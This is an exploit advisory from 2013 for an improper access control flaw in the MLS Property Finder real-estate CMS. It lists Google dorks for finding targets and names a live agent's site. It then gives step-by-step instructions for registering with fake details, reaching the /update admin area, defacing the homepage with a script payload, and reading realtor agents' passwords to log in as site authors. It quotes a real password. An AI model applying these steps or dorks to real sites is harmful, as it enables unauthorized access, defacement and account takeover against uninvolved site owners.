=========================================================== 
MLS Property Finder Improper Access Control Vulnerability 
=========================================================== 
 
:-----------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : MLS Property Finder Improper Access Control Vulnerability 
: # Date : 08 March 2013 
: # Author : X-Cisadane 
: # Vendor : http://www.mlspropertyfinder.com/ AND http://www.rls2000.com/ 
: # Version : All Versions 
: # Category : Web Applications 
: # Vulnerability : Improper Access Control Vulnerability 
: # Tested On : Google Chrome 24.0.1312.52 m (Windows XP Professional SP 3 32-Bit EN US) 
: # Greetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Jakarta Anonymous Club, Bogor-H, Jabar Cyber 
:-----------------------------------------------------------------------------------------------------------------------: 

DORKS (How to find the target) : 
================================ 
intext:How can MLS Property Finder benefit you 
intext:"Do not use commas in your figures" inurl:calculator.asp 
inurl:/register.asp?agentid= 
intext:"Sign up for MLS Property Finder - " 
intext:Take advantage of my FREE MLS Property Finder service 
inurl:/detail_agent.asp?agentid= 
inurl:/searchNEW.asp 
intext:"Fill out the form below for a market analysis" 
inurl:/listing.asp?SearchType=ByOffice 
intext:daily email updates, and much more with MLS Property Finder.
 
 
Proof of Concept 
================= 
The website (CMS) does not restrict access to the "/update" path to a registered member. A registered member can access into the 
Website CMS Manager and Managing the Website through "/update" path via URL without Realtor (Site Author) Privilege! 
 
For Example : 
Live Target : http://www.gowithcraig.com/register.asp?agentid=406764 

1st. Sign up into the Website by Clicking 'Sign up for MLS Property Finder now' or through http://www.gowithcraig.com/register.asp?agentid=406764&s=contact 
2nd. In the Registration Page, fill your contact information (just for formality). Fill the first name, last name, fake email address, etc. 
Pic : http://i50.tinypic.com/2qn4207.png 
 
3rd. Next click '>> Step 2'. After Search Criteria Form appeared you've to fill out that (just for formality). Then click Submit. 
Pic : http://i49.tinypic.com/4l35nn.png
 
4th. Afer you've Clicked Submit button and if the Registration Process was sucessfull, this notification will appear : Thank you, For signing up for my MLS Property Finder, 
you will receive an email with your username, password and instructions on how to log in to see your listings. Click here to view information on your properties selection. 
Pic : http://i48.tinypic.com/33vj9zr.png 
 
5th. Just click : 'Click here' and you has entered the Site within 'Registered Member' feature/privilege. 
Pic : http://i45.tinypic.com/2d8q23a.png 
 
Now, How we can step into the Site Manager??? 
Look at your URL Bar, if the URL is http://www.mlspropertyfinder.com/home/home.asp You've to change into http://www.mlspropertyfinder.com/update/ 
Pic : http://i47.tinypic.com/w17l9t.png 
Voila!!! Now you can Manage the site :)

If you wanna ruin (Deface) the Site, just replace the content of Site Homepage through http://www.mlspropertyfinder.com/update/update_websiteinfo.asp 
Pic : http://i47.tinypic.com/a2u72w.png 
And then Click Edit Content. After that, Click Front Page. 
Pic : http://i48.tinypic.com/24phs8p.png 
And the HTML Editor/Page Editor will show. 
Just fill Meta Title with : Defaced By Your Nick Name. 
And fill the Body (CLICK HTML<> BUTTON) with this Script : <script>document.body.innerHTML="<h1>0WN3D</h1>This Site 0WN3D BY : Your Nick Name<br/>";</script> 
Pic : http://i46.tinypic.com/muu0q1.png 
Click Apply and OK! And Submit. Check the Site (http://www.gowithcraig.com) and Voila!!! Defaced!!! 
Pic : http://i50.tinypic.com/1zofdz4.png
 
If you wanna find the Realtor Agent (Site Author), just go to http://www.mlspropertyfinder.com/update/agents/ 
Pic : http://i46.tinypic.com/optkb5.png 
Look at the Password : paper (Based on my picture above). After you got the password, now you can login as the Realtor Agent (Site Author) through http://www.gowithcraig.com/update/ 
Fill Username with the AgentID : 406764 and Fill Password with : paper 
Pic : http://i50.tinypic.com/24czloy.png 
Q : Where can I find the AgentID?  
A : AgentID appeared in URL Bar while you in the Register Page, If you've forgotten the AgentID just go through the Registration Page :)
 
If the Username and Password was right, now you can login As Realtor Agent (Site Author) 
Pic : http://i49.tinypic.com/296iyid.png 
 
As the alternative Login page for Site Author you can use this Site http://www.rls2000.com/search/login.asp